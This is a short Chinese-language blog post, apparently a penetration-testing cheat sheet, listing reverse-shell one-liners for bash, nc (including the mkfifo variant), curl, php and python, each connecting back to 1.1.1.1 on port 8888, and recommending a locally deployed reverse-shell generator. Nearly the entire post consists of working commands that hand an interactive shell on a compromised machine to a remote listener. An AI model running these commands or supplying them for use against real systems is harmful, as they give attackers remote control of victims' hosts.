反弹shell

推荐在本地部署一个reverse-shell-generator,可以很方便的查看命令

以下是几个常用的

bash -i

1
/bin/sh -i >& /dev/tcp/1.1.1.1/8888 0>&1

nc

1
2
3
4
5
6
7
8
# nc -e
nc 1.1.1.1 8888 -e /bin/sh

# nc -c
nc -c /bin/sh 1.1.1.1 8888

# nc mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 8888 >/tmp/f

curl

1
C='curl -Ns telnet://1.1.1.1:8888'; $C </dev/null 2>&1 | /bin/sh 2>&1 | $C >/dev/null

php

1
2
3
php -r '$sock=fsockopen("1.1.1.1",8888);exec("/bin/sh <&3 >&3 2>&3");'

php -r '$sock=fsockopen("1.1.1.1",8888);system("/bin/sh <&3 >&3 2>&3");'

python

1
2
3
4
5
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("1.1.1.1",8888));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

反弹shell
https://www.dr0n.top/posts/2f610211/
作者
dr0n
发布于
2024年7月15日
更新于
2025年7月29日
许可协议